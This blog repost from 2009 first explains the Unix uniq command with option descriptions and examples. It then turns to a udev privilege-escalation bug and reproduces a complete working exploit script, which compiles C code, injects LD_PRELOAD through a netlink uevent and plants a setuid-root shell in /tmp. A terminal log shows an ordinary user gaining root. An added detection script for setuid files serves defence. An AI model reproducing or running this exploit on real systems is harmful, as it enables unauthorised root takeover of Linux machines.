July 9th, 2009
uniq usage explained (repost)

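uniq checks the specified ASCII file or standard input for uniqueness, identifying lines that appear more than once in a text file. It is commonly used for system troubleshooting and log analysis.
I. Version
Taking Red Flag DC Server 5.0 as an example, the bundled version is: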

# uniq --version
uniq (coreutils) 5.2.1

II. Common options
Command format:

uniq [options] [file1 [file2] ]

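uniq removes duplicate lines from the already-sorted text file file1 and writes the result to standard output or to file2. It is often used as a filter in a pipeline.
Before using uniq, make sure the text file has been sorted with sort, because uniq only compares adjacent lines. Run without options, uniq removes the duplicate lines.
Common options: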

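-c, --count
   Prefix each line with the number of times it occurred
-d, --repeated
   Show only the lines that are repeated
-D, --all-repeated[=method]
   Print all repeated lines in the specified format. The method can only be given with the long option; the three values are none (default), prepend and separate, and their effect is shown below. Groups are delimited by blank lines.
-f n, --skip-fields=n
   The first n fields, together with the blanks before each field, are ignored. A field is a string of non-space, non-tab characters; fields are separated from each other by tabs and spaces (fields are numbered from 1). Same as -n, where n is the number of fields.
-i, --ignore-case
   Ignore differences in case when comparing lines
-s n, --skip-chars=n
   The first n characters are skipped and ignored in the comparison (characters are numbered from 1). Same as +n, where n is the number of characters.
-u, --unique
   Show only the lines that occur once
-w n, --check-chars=n
   Compare only the first n characters of each line
--help
   Show help information
--version
   Show version information
[input file]
   An already-sorted text file, or standard input
[output file]
   The output file; if not given, output is shown on the screen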

III. Examples
1. Original file

# cat text
The year.
The year.
Second
Second
Second
Third
Third
Four

2. Results of the -D option

# uniq -D text
The year.
The year.
Second
Second
Second
Third
Third
# uniq --all-repeated=prepend text
 
The year.
The year.
 
Second
Second
Second
 
Third
Third
# uniq --all-repeated=separate text
The year.
The year.
 
Second
Second
Second
 
Third
Third

3. The -f and -s options
Original file:

# cat text
The year.
The year ok.
Second
Second
Second
Third
Third
Four

Results:

# uniq -u text
The year.
The year ok.
Four
# uniq -u -f 1 text
The year.
The year ok.
# uniq -u -f 2 text
The year.
The year ok.
# uniq -u -f 3 text

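The following shows the non-repeated lines in the file text, ignoring the first 2 fields and the 3 characters after them, i.e. the comparison starts at the 4th character of the 3rd field:
(Because "ok." is followed by a \n newline character, it differs when compared with the first line.)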

# uniq -u -f 2 -s 3 text
The year.
The year ok.
# uniq -u -f 2 -s 4 text
# uniq -u -2 +3 text
The year.
The year ok.
# uniq -u -2 +4 text

Here is one more, simpler example:

# cat text
test one
eest one
# uniq -u text
test one
eest one
# uniq -u -f 1 text
# uniq -u -s 1 text

※ So field numbers and character numbers both start from 1.

4. Other

uniq list list.new

Removes the duplicate lines from the file list and writes the result to list.new. (Only one copy of each repeated line is kept.)

sort names | uniq -d

Shows which lines in the file names are repeated.
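
The sort requirement from section II and the -f option, applied to the log-analysis use mentioned at the top, as an added example that is not part of the original article. The log lines are constructed, and the function names are hypothetical.

```shell
#!/bin/sh
# Constructed sample in syslog style (addresses are documentation ranges).
sample_log() {
cat <<'EOF'
Jul  9 13:04:01 web1 sshd: Failed password for root from 192.0.2.10
Jul  9 13:04:03 web1 sshd: Failed password for root from 192.0.2.10
Jul  9 13:04:05 web1 sshd: Accepted password for test from 198.51.100.7
Jul  9 13:04:09 web1 sshd: Failed password for root from 192.0.2.10
Jul  9 13:05:11 web1 sshd: Failed password for admin from 203.0.113.5
EOF
}

# Pitfall: no sort. uniq only merges adjacent lines, so the three identical
# root failures are split into two groups by the "Accepted" line between them.
count_unsorted() {
    sample_log | uniq -c -f 3
}

# Correct: sort on the same key uniq will compare (field 4 to end of line),
# skip the three timestamp fields with -f 3, then rank groups by count.
count_sorted() {
    sample_log | LC_ALL=C sort -k4 | uniq -c -f 3 | LC_ALL=C sort -rn
}

echo "unsorted input:"; count_unsorted
echo "sorted input:";   count_sorted
```

With sorted input the root failures collapse into a single group with count 3; each group is printed with the timestamp of its first line.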
IV. References
Original:

http://www.oreillynet.com/linux/cmd/cmd.csp?path=u/uniq

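A udev privilege-escalation vulnerability was disclosed recently: with only ordinary user privileges, it is possible to escalate to root. I tried it out, and escalation really is easy.
Save the code below as the file test.sh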

#!/bin/sh
# Linux 2.6
# bug found by Sebastian Krahmer
#
# lame sploit using LD technique 
# by kcope in 2009
# tested on debian-etch,ubuntu,gentoo
# do a 'cat /proc/net/netlink'
# and set the first arg to this
# script to the pid of the netlink socket
# (the pid is udevd_pid - 1 most of the time)
# + sploit has to be UNIX formatted text :)
# + if it doesn't work the 1st time try more often
#
# WARNING: maybe needs some FIXUP to work flawlessly
## greetz fly out to alex,andi,adize,wY!,revo,j! and the gang
 
cat > udev.c << _EOF
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <dirent.h>
#include <sys/stat.h>
#include <sysexits.h>
#include <wait.h>
#include <signal.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>
 
#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif
 
#define SHORT_STRING 64
#define MEDIUM_STRING 128
#define BIG_STRING 256
#define LONG_STRING 1024
#define EXTRALONG_STRING 4096
#define TRUE 1
#define FALSE 0
 
int socket_fd;
struct sockaddr_nl address;
struct msghdr msg;
struct iovec iovector;
int sz = 64*1024;
 
main(int argc, char **argv) {
        char sysfspath[SHORT_STRING];
        char subsystem[SHORT_STRING];
        char event[SHORT_STRING];
        char major[SHORT_STRING];
        char minor[SHORT_STRING];
 
        sprintf(event, "add");
        sprintf(subsystem, "block");
        sprintf(sysfspath, "/dev/foo");
        sprintf(major, "8");
        sprintf(minor, "1");
 
        memset(&address, 0, sizeof(address));
        address.nl_family = AF_NETLINK;
        address.nl_pid = atoi(argv[1]);
        address.nl_groups = 0;
 
        msg.msg_name = (void*)&address;
        msg.msg_namelen = sizeof(address);
        msg.msg_iov = &iovector;
        msg.msg_iovlen = 1;
 
        socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
        bind(socket_fd, (struct sockaddr *) &address, sizeof(address));
 
        char message[LONG_STRING];
        char *mp;
 
        mp = message;
        mp += sprintf(mp, "%s@%s", event, sysfspath) +1;
        mp += sprintf(mp, "ACTION=%s", event) +1;
        mp += sprintf(mp, "DEVPATH=%s", sysfspath) +1;
        mp += sprintf(mp, "MAJOR=%s", major) +1;
        mp += sprintf(mp, "MINOR=%s", minor) +1;
        mp += sprintf(mp, "SUBSYSTEM=%s", subsystem) +1;
        mp += sprintf(mp, "LD_PRELOAD=/tmp/libno_ex.so.1.0") +1;
 
        iovector.iov_base = (void*)message;
        iovector.iov_len = (int)(mp-message);
 
        char *buf;
        int buflen;
        buf = (char *) &msg;
        buflen = (int)(mp-message);
 
        sendmsg(socket_fd, &msg, 0);
 
        close(socket_fd);
 
	sleep(10);
//	execl("/tmp/suid", "suid", (void*)0);
}
 
_EOF
gcc udev.c -o /tmp/udev
cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <sys/stat.h>
 
 
void _init()
{
 setgid(0);
 setuid(0);
 unsetenv("LD_PRELOAD");
// execl("/bin/sh","sh","-c","chown root:root /tmp/suid; chmod +s /tmp/suid",NULL);
chown("/tmp/suid",0,0);
chmod("/tmp/suid",S_IRUSR|S_IWUSR|S_ISUID|S_IXUSR|S_IROTH|S_IXOTH);
}
 
_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
cat > suid.c << _EOF
int main(void) {
       setgid(0); setuid(0);
       execl("/bin/sh","sh",0); }
_EOF
gcc -o /tmp/suid suid.c
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
/tmp/udev $1
 
# milw0rm.com [2009-04-20]
 
/tmp/suid

Then a few simple steps are enough to go from an ordinary user to root

[test@sbear-cn test]$ id
uid=500(test) gid=500(test) groups=500(test)
[test@sbear-cn test]$ ps -ef|grep udev
root       502     1  0 13:04 ?        00:00:00 /sbin/udevd -d    //check the current PID of the udevd service
test     2635  2564  0 13:07 pts/0    00:00:00 grep udev
[test@sbear-cn test]$ sh test.sh 501   //the udevd PID minus 1, i.e. 502-1 = 501
suid.c: In function 'main':
suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
sh-3.2# id
uid=0(root) gid=0(root) groups=500(test)  //root privileges obtained
sh-3.2# ls /root/
anaconda-ks.cfg 
sh-3.2#

Upgrade your udev right away.
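
A check for the artifact the script above leaves behind, a setuid file owned by root in /tmp, as an added example that is not part of the original post. The function name and the default directory list are assumptions.

```shell
#!/bin/sh
# List setuid/setgid regular files under world-writable staging directories.
# Usage: find_suid_in_tmp [dir ...]   (assumed defaults: /tmp /var/tmp /dev/shm)
find_suid_in_tmp() {
    [ "$#" -gt 0 ] || set -- /tmp /var/tmp /dev/shm
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        # -xdev: stay on one filesystem
        # -perm -4000 / -perm -2000: setuid / setgid bit is set
        # ls -ln prints the numeric owner in column 3; 0 means root.
        # Unreadable subdirectories are skipped silently.
        find "$dir" -xdev -type f \( -perm -4000 -o -perm -2000 \) \
            -exec ls -ln {} \; 2>/dev/null || :
    done
}

find_suid_in_tmp "$@"
```

Any hit owned by uid 0 in these directories warrants investigation; mounting them with the nosuid option keeps such files from taking effect.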

